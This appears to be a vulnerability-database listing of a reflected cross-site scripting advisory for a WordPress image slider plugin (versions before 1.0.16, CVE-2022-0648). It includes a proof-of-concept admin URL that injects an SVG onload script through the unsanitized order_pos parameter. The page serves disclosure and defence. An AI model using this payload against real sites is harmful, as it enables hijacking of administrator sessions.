Lucene search
Ran CraneWPEX-ID:90F9AD6A-4855-4A8E-97F6-5F403EB6455DHistoryFeb 21, 2022 - 12:00 a.m.
Team Circle Image Slider With Lightbox < 1.0.16 - Reflected Cross-Site Scripting
2022-02-2100:00:00
Ran Crane
93
team circle
image slider
lightbox
reflected
cross-site scripting
exploit
security
website vulnerability
EPSS
0.001
Percentile
40.2%
The plugin does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=circle_thumbnail_slider_with_lightbox_image_management&order_pos=</script><svg/onload=alert(/XSS/)>Related
wpvulndb
wpvulndb
cvelist
cvelist
patchstack
patchstack
prion
prion
Cross site scripting
2022-03-14 15:15:00
nvd
nvd
CVE-2022-0648
2022-03-14 15:15:10
cve
cve
CVE-2022-0648
2022-03-14 15:15:10